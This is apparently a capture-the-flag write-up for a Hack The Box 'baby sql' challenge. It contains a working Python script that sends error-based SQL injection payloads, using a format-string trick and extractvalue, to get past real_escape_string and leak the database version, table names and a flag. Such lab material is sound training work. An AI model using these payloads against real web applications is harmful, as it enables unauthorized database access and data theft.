https://app.hackthebox.com/challenges/146

Description

I heard that *real_escape_string() functions protect you from malicious user input inside SQL statements, I hope you can’t prove me wrong…

Exploitation

#!/usr/bin/env python3
import requests
import sys

def send_post_request(url, data):
    return requests.post(url, data=data)

if len(sys.argv) != 2:
    print(f"Usage: python {sys.argv[0]} <ip:port>")
    sys.exit(1)
host, port = sys.argv[1].split(':')
HOST = f'http://{host}:{port}/'
payloads = [
    {'pass': "%1$')||extractvalue(null,concat(0x7e, version()));#"},
    {'pass': "%1$')||extractvalue(null,concat(0x7e,(select group_concat(table_name) from information_schema.tables WHERE table_schema=database())));#"},
    {'pass': "%1$')||extractvalue(null,concat(0x7e,(select * from totally_not_a_flag)));#"}
]
for payload in payloads:
    print(send_post_request(HOST, payload).text)

Summary

baby sql: exploit the SQL injection, extract the needed data, and reach the flag.